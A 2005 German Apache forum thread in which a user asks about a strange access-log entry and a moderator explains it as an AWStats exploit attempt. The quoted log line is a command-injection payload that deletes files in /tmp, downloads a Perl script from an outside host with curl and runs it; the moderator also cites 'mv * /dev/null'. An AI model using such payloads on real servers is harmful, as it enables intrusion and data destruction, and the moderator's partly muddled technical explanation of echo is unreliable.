Echo - was ist das?

Alles, was den Apache betrifft, kann hier besprochen werden.

Echo - was ist das?

Postby Vössli » 28. October 2005 11:37

Hallo

ich hab mal meine logs durchgeforstet - ein paar Einträge sind sehr ominös:
GET //awstats.pl?configdir=|echo;cd /tmp;rm -rf *;curl -O http://www.geocities.com/ircrider/a.pl;perl a.pl;echo ;rm -rf a.pl*;echo| HTTP/1.1 404 290 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )

Weiß jemand was der Beriff "Echo" meint? Ich hoffe es ist nicht weiter schlimm, aber zum Glück kommt jedesmal der Fehler 404, immerhin.
Vössli
 
Posts: 18
Joined: 26. July 2005 15:03

Postby deepsurfer » 28. October 2005 11:43

Das hatten wir schonmal hier im Forum.
Es wird versucht dein System zu löschen !

Da sind wieder einige ScriptKiddis unterwegs, die mal gelesen haben das der AWSTATs einen Bug hat und man mittells einer http übermittlung diesen Bug ausnützen kann um die Platte zu löschen.

Wobei es bei dir so aussieht das nur das /tmp Verzeichnis gelöscht werden soll. Ich vermute das die ScriptKiddis neidisch auf Stats sind und somit deinen AWSTAT auf null setzen wollen.

Der begriff "echo" in diesem zusammenhang soll dem Perl script eine Anweisung übermittteln, da aber Perl keine variablen einfach so annimmt wird ein echo benutzt um eine physische Eingabe vorzutäuschen.

Wenn du kein AWSTAT benutzt ist es normal das ein 404 geantwortet wird.
Dieser Eintrag kann aber auch an den vorherigen DSL-IP Besitzer gerichtet sein, da du aber jetzt die IP hast erhältst du die Übermittlung.
chirio Deep
Wie sagte einst der MCP aus Tron auf dem Bildschirm zu schreiben Pflegte
" ... end of communication ... "
User avatar
deepsurfer
AF Moderator
 
Posts: 6440
Joined: 23. November 2004 10:44
Location: Cologne
Operating System: Win-XP / Win7 / Linux -Debian

Postby Vössli » 28. October 2005 12:42

Achso, danke für die Hinweise! Mit Echo werden also Anweisungen vom bzw. zum Client geschickt.
AWstat benutze ich nicht. Da kann also nicht viel passieren 8)
LG
Vössli
Vössli
 
Posts: 18
Joined: 26. July 2005 15:03

Postby deepsurfer » 28. October 2005 16:15

Achso, danke für die Hinweise! Mit Echo werden also Anweisungen vom bzw. zum Client geschickt.

JAein.... nicht nur

Echo ist im grunde nix weiter als "Zeige mir an" / "Das was ich hier habe, bitte wiederholen"

hmmm....andere erklärung...

Normalerweise kannst du einem Perl-script mit variablen füttern die über ein formular im htmlcode übergeben werden.
Diese verarbeitet das empfängerscript dann.

Bei AWSTATscript kannst du nicht ohne weiteres ein Forumlar mit variblen hineinschicken, also geht dieses "Hackerscript" hin und ruft das Perl-Script direkt auf. Da nun ein BUG in diesem Perl-Script vorhanden -war- konnte man in dieses Script mit Echo dann werte implemmentieren.

Durch den BUG wurden dann diese werte ausgeführt und in deinem Beispiel ist das der befehl "rm -rf * " das ist eine Unixanweisung.

rm = remove
-r = recursive (abwärts ab diesen punkt)
-f = force (egal welche meldung den rm befehl fortführen)

Früher war auch sehr beliebt "mv * /dev/null "
Wenn Du Linux kennst dann kennst du ja die befehle.
chirio Deep
Wie sagte einst der MCP aus Tron auf dem Bildschirm zu schreiben Pflegte
" ... end of communication ... "
User avatar
deepsurfer
AF Moderator
 
Posts: 6440
Joined: 23. November 2004 10:44
Location: Cologne
Operating System: Win-XP / Win7 / Linux -Debian


Return to Apache

Who is online

Users browsing this forum: No registered users and 5 guests